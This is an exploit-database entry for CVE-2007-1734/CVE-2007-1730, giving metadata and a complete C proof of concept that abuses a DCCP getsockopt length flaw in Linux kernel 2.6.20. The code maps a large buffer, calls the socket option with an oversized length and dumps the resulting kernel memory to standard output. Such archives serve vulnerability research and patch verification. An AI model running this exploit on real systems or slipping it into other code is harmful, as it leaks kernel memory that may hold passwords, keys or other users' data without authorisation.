Linux Kernel 2.6.20 with DCCP Support - Memory Disclosure (2)

Author: Robert Swiecki
type: local
platform: linux
port: 
date_added: 2007-03-27 
date_updated: 2016-10-03 
verified: 1 
codes: CVE-2007-1734;CVE-2007-1730 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comlinux-2.6.20.1.tar.gz

#include <netinet/in.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <sys/mman.h>
#include <linux/net.h>

#define BUFSIZE 0x10000000

int main(int argc, char *argv[])
{
    void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE,
               MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
    if (mem == (void*)-1) {
       printf("Alloc failed\n");
       return -1;
    }
    /* SOCK_DCCP, IPPROTO_DCCP */
    int s = socket(PF_INET, 6, 33);
    if (s == -1) {
       fprintf(stderr, "socket failure!\n");
       return 1;
    }
   /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */
    int len = BUFSIZE;
    int x = getsockopt(s, 269, 11, mem, &len);

    if (x == -1)
       perror("SETSOCKOPT");
    else
       printf("SUCCESS\n");

    write(1, mem, BUFSIZE);

    return 0;
}

// milw0rm.com [2007-03-28]